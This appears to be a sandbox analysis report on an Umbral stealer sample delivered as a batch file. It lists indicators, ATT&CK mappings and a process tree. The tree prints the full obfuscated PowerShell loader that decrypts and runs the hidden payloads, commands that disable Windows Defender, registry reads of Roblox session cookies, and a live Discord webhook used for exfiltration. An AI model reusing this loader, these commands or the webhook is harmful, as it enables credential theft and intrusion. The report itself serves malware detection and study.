umbral | 5c857070215559b9e49212029a3ae61eb292347f527ba4b2f8f602eaae003654

Resubmissions

11/01/2025, 02:53

250111-ddkf7ssrap 10

Analysis

max time kernel
11s
max time network
10s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
11/01/2025, 02:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Umbral.bat
Size

387KB
MD5

1e183c2ada7d55a0ccf510721415d5bc
SHA1

fdf973e881b0999cfde6e1a4404e0a14fba53aab
SHA256

5c857070215559b9e49212029a3ae61eb292347f527ba4b2f8f602eaae003654
SHA512

4b1a3f2e91b01468c219650e8c685bc197cb0fe2907c71db073b4a59d2cfdc91ed7975c1af01de5aed89fa59dd2b17785777e57653b896a4a39f73a65d37ec49
SSDEEP

6144:8idBBBsj84TcfmJNvqNuxdoyw6HWT1uPnCFIv8uOpjMWYYubRJjp03rrHA/APAxL:8idBBV8HolsnC6EUjEOAIdwum+

Score

10^/10

umbral discovery execution stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1315812787699585118/w2lqDrVQqtFwk0uhRh-_CNIYMagyoPfqPEpCtbHgfK7cFpwIVOyIa3juwBy7vnR8Bh0g

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral2/memory/4868-17-0x000002361D8A0000-0x000002361D8E0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	4868	powershell.exe
3	4868	powershell.exe
4	4868	powershell.exe
5	4868	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4384	powershell.exe
764	powershell.exe
2656	powershell.exe
4844	powershell.exe
4868	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2320	InjectorForRyker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2664	2320	WerFault.exe	80

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InjectorForRyker.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2768	cmd.exe
3540	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4636	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3540	PING.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4384	powershell.exe
4384	powershell.exe
764	powershell.exe
764	powershell.exe
2656	powershell.exe
2656	powershell.exe
5048	powershell.exe
5048	powershell.exe
4844	powershell.exe
4844	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeIncreaseQuotaPrivilege	4068	wmic.exe
Token: SeSecurityPrivilege	4068	wmic.exe
Token: SeTakeOwnershipPrivilege	4068	wmic.exe
Token: SeLoadDriverPrivilege	4068	wmic.exe
Token: SeSystemProfilePrivilege	4068	wmic.exe
Token: SeSystemtimePrivilege	4068	wmic.exe
Token: SeProfSingleProcessPrivilege	4068	wmic.exe
Token: SeIncBasePriorityPrivilege	4068	wmic.exe
Token: SeCreatePagefilePrivilege	4068	wmic.exe
Token: SeBackupPrivilege	4068	wmic.exe
Token: SeRestorePrivilege	4068	wmic.exe
Token: SeShutdownPrivilege	4068	wmic.exe
Token: SeDebugPrivilege	4068	wmic.exe
Token: SeSystemEnvironmentPrivilege	4068	wmic.exe
Token: SeRemoteShutdownPrivilege	4068	wmic.exe
Token: SeUndockPrivilege	4068	wmic.exe
Token: SeManageVolumePrivilege	4068	wmic.exe
Token: 33	4068	wmic.exe
Token: 34	4068	wmic.exe
Token: 35	4068	wmic.exe
Token: 36	4068	wmic.exe
Token: SeIncreaseQuotaPrivilege	4068	wmic.exe
Token: SeSecurityPrivilege	4068	wmic.exe
Token: SeTakeOwnershipPrivilege	4068	wmic.exe
Token: SeLoadDriverPrivilege	4068	wmic.exe
Token: SeSystemProfilePrivilege	4068	wmic.exe
Token: SeSystemtimePrivilege	4068	wmic.exe
Token: SeProfSingleProcessPrivilege	4068	wmic.exe
Token: SeIncBasePriorityPrivilege	4068	wmic.exe
Token: SeCreatePagefilePrivilege	4068	wmic.exe
Token: SeBackupPrivilege	4068	wmic.exe
Token: SeRestorePrivilege	4068	wmic.exe
Token: SeShutdownPrivilege	4068	wmic.exe
Token: SeDebugPrivilege	4068	wmic.exe
Token: SeSystemEnvironmentPrivilege	4068	wmic.exe
Token: SeRemoteShutdownPrivilege	4068	wmic.exe
Token: SeUndockPrivilege	4068	wmic.exe
Token: SeManageVolumePrivilege	4068	wmic.exe
Token: 33	4068	wmic.exe
Token: 34	4068	wmic.exe
Token: 35	4068	wmic.exe
Token: 36	4068	wmic.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeIncreaseQuotaPrivilege	1692	wmic.exe
Token: SeSecurityPrivilege	1692	wmic.exe
Token: SeTakeOwnershipPrivilege	1692	wmic.exe
Token: SeLoadDriverPrivilege	1692	wmic.exe
Token: SeSystemProfilePrivilege	1692	wmic.exe
Token: SeSystemtimePrivilege	1692	wmic.exe
Token: SeProfSingleProcessPrivilege	1692	wmic.exe
Token: SeIncBasePriorityPrivilege	1692	wmic.exe
Token: SeCreatePagefilePrivilege	1692	wmic.exe
Token: SeBackupPrivilege	1692	wmic.exe
Token: SeRestorePrivilege	1692	wmic.exe
Token: SeShutdownPrivilege	1692	wmic.exe
Token: SeDebugPrivilege	1692	wmic.exe
Token: SeSystemEnvironmentPrivilege	1692	wmic.exe
Token: SeRemoteShutdownPrivilege	1692	wmic.exe
Token: SeUndockPrivilege	1692	wmic.exe
Token: SeManageVolumePrivilege	1692	wmic.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 3040 wrote to memory of 4868	3040	cmd.exe	78
PID 3040 wrote to memory of 4868	3040	cmd.exe	78
PID 4868 wrote to memory of 2320	4868	powershell.exe	80
PID 4868 wrote to memory of 2320	4868	powershell.exe	80
PID 4868 wrote to memory of 2320	4868	powershell.exe	80
PID 4868 wrote to memory of 4068	4868	powershell.exe	81
PID 4868 wrote to memory of 4068	4868	powershell.exe	81
PID 4868 wrote to memory of 3348	4868	powershell.exe	83
PID 4868 wrote to memory of 3348	4868	powershell.exe	83
PID 4868 wrote to memory of 4384	4868	powershell.exe	85
PID 4868 wrote to memory of 4384	4868	powershell.exe	85
PID 4868 wrote to memory of 764	4868	powershell.exe	90
PID 4868 wrote to memory of 764	4868	powershell.exe	90
PID 4868 wrote to memory of 2656	4868	powershell.exe	92
PID 4868 wrote to memory of 2656	4868	powershell.exe	92
PID 4868 wrote to memory of 5048	4868	powershell.exe	94
PID 4868 wrote to memory of 5048	4868	powershell.exe	94
PID 4868 wrote to memory of 1692	4868	powershell.exe	96
PID 4868 wrote to memory of 1692	4868	powershell.exe	96
PID 4868 wrote to memory of 4764	4868	powershell.exe	98
PID 4868 wrote to memory of 4764	4868	powershell.exe	98
PID 4868 wrote to memory of 1480	4868	powershell.exe	100
PID 4868 wrote to memory of 1480	4868	powershell.exe	100
PID 4868 wrote to memory of 4844	4868	powershell.exe	102
PID 4868 wrote to memory of 4844	4868	powershell.exe	102
PID 4868 wrote to memory of 4636	4868	powershell.exe	104
PID 4868 wrote to memory of 4636	4868	powershell.exe	104
PID 4868 wrote to memory of 2768	4868	powershell.exe	106
PID 4868 wrote to memory of 2768	4868	powershell.exe	106
PID 2768 wrote to memory of 3540	2768	cmd.exe	108
PID 2768 wrote to memory of 3540	2768	cmd.exe	108

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3348	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Umbral.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wTci3adIPYtqwNqviR+bzxwYoPNzIDvidB9TXeKW2VA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1LNpTwGSYS6FnEm0MyrT1w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcNMZ=New-Object System.IO.MemoryStream(,$param_var); $ARybZ=New-Object System.IO.MemoryStream; $YWZqC=New-Object System.IO.Compression.GZipStream($rcNMZ, [IO.Compression.CompressionMode]::Decompress); $YWZqC.CopyTo($ARybZ); $YWZqC.Dispose(); $rcNMZ.Dispose(); $ARybZ.Dispose(); $ARybZ.ToArray();}function execute_function($param_var,$param2_var){ $Sixjx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SbGkr=$Sixjx.EntryPoint; $SbGkr.Invoke($null, $param2_var);}$VIhio = 'C:\Users\Admin\AppData\Local\Temp\Umbral.bat';$host.UI.RawUI.WindowTitle = $VIhio;$ndlLw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VIhio).Split([Environment]::NewLine);foreach ($QIyrO in $ndlLw) { if ($QIyrO.StartsWith(':: ')) { $uHQeh=$QIyrO.Substring(3); break; }}$payloads_var=[string[]]$uHQeh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\Users\Admin\AppData\Local\Temp\InjectorForRyker.exe
    "C:\Users\Admin\AppData\Local\Temp\InjectorForRyker.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2320
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 1080
      4⤵
      Program crash
      PID:2664
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4068
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s ""
    3⤵
    - Views/modifies file attributes
    PID:3348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5048
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4764
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4844
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4636
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2320 -ip 2320
1⤵
PID:1072

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
10254f48b63b60ae6245903153592e48

SHA1
2c300d1c60c50e8896705022bc402c423681f40a

SHA256
b3778ffb5260878714023fd1abc70c4e850b5397c2b32a3975b1ff28bfd96c69

SHA512
6a7e7844c47a07bc8fd0b59267f0d1bac460f672ada93131edd65ca2eb33159de9f6291a1acde745f32991b364e9ceac697f2dfcf1a2696b51a9120dd7af77d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
3KB

MD5
2a53d3f128077b415fb2cd9ff7f57ac4

SHA1
be170775479493d524538d8ff57f5075cb94b819

SHA256
d864a7ffb880c435bd36493e381fe5ca3617217969edd096aab5d7589aa6cfc3

SHA512
696057c0430ee1a5c817f71d2443897beab6bc04bb30ce0def84e1a993b5e458174fd7e38ce5a23b6ed974c213575b148a3bda92c4dd64320e06ed55b8b54d45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
711b161528f4959c4b7463036c7324ec

SHA1
53b30cc796c0dfe0cd4c4406202a19139cb5407d

SHA256
7c077fb04d4911778ab648b657b43c9b464393d734dc7fa029ee0f085c6a5638

SHA512
565d0e3e229894de91ad37a16c261bf380e983ffda750f32e8ad361c0606c62043a0188f45d252fecabc6438bc9e7b2c424b101073162ba9633bacd03b42af9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Temp\InjectorForRyker.exe

Filesize
47KB

MD5
79462e4c8dbe2f3d18bee712144c093a

SHA1
e971c1632c6f3cecb02f7145c56243af2ba3dbcb

SHA256
bd7b50f7eb1081db03d83779a4f4bcf348947d808a16494aae259422b184f749

SHA512
596d1c44a7c7e4070eff2f525bb93eac760b1512245805c38b98b1ae9a1646c64d9ee2a06223369221f0c1d31b9de8cda1ce79bba13d4fd6080c4138981c2a8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lteahwfn.5yl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2320-32-0x0000000005300000-0x0000000005312000-memory.dmp

Filesize
72KB

Download
memory/2320-33-0x0000000005520000-0x000000000552A000-memory.dmp

Filesize
40KB

Download
memory/2320-28-0x000000007495E000-0x000000007495F000-memory.dmp

Filesize
4KB

Download
memory/2320-29-0x0000000000790000-0x00000000007A2000-memory.dmp

Filesize
72KB

Download
memory/2320-30-0x0000000005890000-0x0000000005E36000-memory.dmp

Filesize
5.6MB

Download
memory/2320-31-0x0000000005380000-0x0000000005412000-memory.dmp

Filesize
584KB

Download
memory/4868-57-0x000002361DF90000-0x000002361DFE0000-memory.dmp

Filesize
320KB

Download
memory/4868-93-0x000002361DEA0000-0x000002361DEAA000-memory.dmp

Filesize
40KB

Download
memory/4868-14-0x000002361D850000-0x000002361D8A2000-memory.dmp

Filesize
328KB

Download
memory/4868-13-0x000002361D780000-0x000002361D788000-memory.dmp

Filesize
32KB

Download
memory/4868-56-0x000002361DF10000-0x000002361DF86000-memory.dmp

Filesize
472KB

Download
memory/4868-17-0x000002361D8A0000-0x000002361D8E0000-memory.dmp

Filesize
256KB

Download
memory/4868-58-0x000002361E030000-0x000002361E04E000-memory.dmp

Filesize
120KB

Download
memory/4868-12-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/4868-11-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/4868-0-0x00007FFD61473000-0x00007FFD61475000-memory.dmp

Filesize
8KB

Download
memory/4868-94-0x000002361DED0000-0x000002361DEE2000-memory.dmp

Filesize
72KB

Download
memory/4868-10-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/4868-9-0x000002361D790000-0x000002361D7B2000-memory.dmp

Filesize
136KB

Download
memory/4868-114-0x00007FFD61473000-0x00007FFD61475000-memory.dmp

Filesize
8KB

Download
memory/4868-115-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/4868-116-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download
memory/4868-117-0x00007FFD61470000-0x00007FFD61F32000-memory.dmp

Filesize
10.8MB

Download